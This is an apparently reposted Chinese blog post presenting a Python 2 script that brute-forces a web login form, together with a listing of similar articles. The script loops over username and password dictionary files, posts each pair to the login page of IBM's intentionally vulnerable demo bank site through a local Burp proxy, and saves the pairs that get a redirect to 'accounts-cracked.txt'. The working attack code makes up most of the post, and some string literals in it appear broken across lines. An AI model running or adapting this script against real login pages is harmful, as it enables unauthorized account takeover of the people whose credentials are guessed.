使用 python 的httplib模塊爆破 form 表單的簡易腳本

alighters 發布于2019-06-21 16:33 / 658人閱讀

摘要：包含了爆破的表單的使用方法中代理的添加方法添加代理代理本地監聽一個端口目的是查看發包和回包的情況測試網站為的靶機網站頁面返回的頁面找到個賬號密碼

httplib：

包含了 httplib爆破 web 的 form 表單的使用方法

httplib 中代理的添加方法

# -*- coding: utf-8 -*-
import urllib
import httplib
import re

headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36",
           "Content-Type": "application/x-www-form-urlencoded",
           "Referer": "http://demo.testfire.net/bank/login.aspx"}
def brute_force(user, password):
    #添加代理
    conn = httplib.HTTPConnection("localhost","8080")  # 代理,本地 burp 監聽一個8080端口,目的是查看發包和回包的情況
    data = {"uid": user, "passw": password,"btnSubmit":"Login"}
    params = urllib.urlencode(data)
    #測試網站為 IBM 的靶機網站
    page = conn.request("POST", "http://demo.testfire.net/bank/login.aspx", params, headers=headers)  # request頁面
    response = conn.getresponse()#返回的頁面
    status = response.status
    if status==302:
        print "---- find user:", user, " with password:",password, "-----"+"
"
        outFile.write(user + ":" + password + "
")
    else:
        print "----- error user:", user.replace("
",""), " with password:",password.replace("
","") , "-----"
    return


outFile = open("accounts-cracked.txt", "w")

if __name__ == "__main__":
    with open("user.dic", "r") as userline:
        y = userline.readlines()
        with open("pass.dic", "r") as passline:
            b= passline.readlines()
            for u in y:
                for p in b:
                    brute_force(user=u.replace("
",""),password=p.replace("
",""))
outFile.close()
with open("accounts-cracked.txt","r") as text:
    list = text.readlines()
    sum=len(list)

if sum>0:
    print "找到",sum,"個賬號密碼"
else:
    print "All thread OK,maybe not "

云服務器 GPU云服務器 html的form表單 js提交本form表單的數據爆破腳本爆破服務器 python模塊使用

文章版權歸作者所有，未經允許請勿轉載,若此文章存在違規行為，您可以聯系管理員刪除。

轉載請注明本文地址：http://specialneedsforspecialkids.com/yun/11235.html

使用 python 的httplib模塊爆破 form 表單的簡易腳本

摘要：包含了爆破的表單的使用方法中代理的添加方法添加代理代理本地監聽一個端口目的是查看發包和回包的情況測試網站為的靶機網站頁面返回的頁面找到個賬號密碼 httplib：包含了 httplib爆破 web 的 form 表單的使用方法 httplib 中代理的添加方法 # -*- coding: utf-8 -*- import urllib import httplib import ...

IntMain 2019-07-31 10:56 評論0 收藏0
使用 python 的request模塊爆破 form 表單的簡易腳本

摘要：的中模塊在表單爆破的使用方法模塊中代理的使用方式模塊是中比較全的模塊簡單易用比之前文章中使用的都要好用可以替換為的方法方法用于移除字符串頭尾指定的字符默認為空格添加代理本地端口的代理是工具主要是查看腳本發包回包的情況好定位問題如 python 的 http 中 request模塊在web 表單爆破的使用方法 request模塊中代理的使用方式 request 模塊是http 中比較全...

mgckid 2019-06-21 16:35 評論0 收藏0
使用 python 的request模塊爆破 form 表單的簡易腳本

摘要：的中模塊在表單爆破的使用方法模塊中代理的使用方式模塊是中比較全的模塊簡單易用比之前文章中使用的都要好用可以替換為的方法方法用于移除字符串頭尾指定的字符默認為空格添加代理本地端口的代理是工具主要是查看腳本發包回包的情況好定位問題如 python 的 http 中 request模塊在web 表單爆破的使用方法 request模塊中代理的使用方式 request 模塊是http 中比較全...

alanoddsoff 2019-07-31 10:56 評論0 收藏0
使用 python 的 urllib2和 urllib模塊爆破 form 表單的簡易腳本

摘要：導入用戶名字典導入密碼的字典找到個賬號密碼輸入有點丑將就用下 python 的 http 中 urllib2和 urllib模塊在web 表單爆破的使用方法腳本中還增加了 urllib2和 urllib模塊如何添加代理的方法 # -*- coding: utf-8 -*- import urllib2 import urllib import time def brute_f...

crossea 2019-06-21 16:33 評論0 收藏0
使用 python 的 urllib2和 urllib模塊爆破 form 表單的簡易腳本

摘要：導入用戶名字典導入密碼的字典找到個賬號密碼輸入有點丑將就用下 python 的 http 中 urllib2和 urllib模塊在web 表單爆破的使用方法腳本中還增加了 urllib2和 urllib模塊如何添加代理的方法 # -*- coding: utf-8 -*- import urllib2 import urllib import time def brute_f...

loostudy 2019-07-31 10:56 評論0 收藏0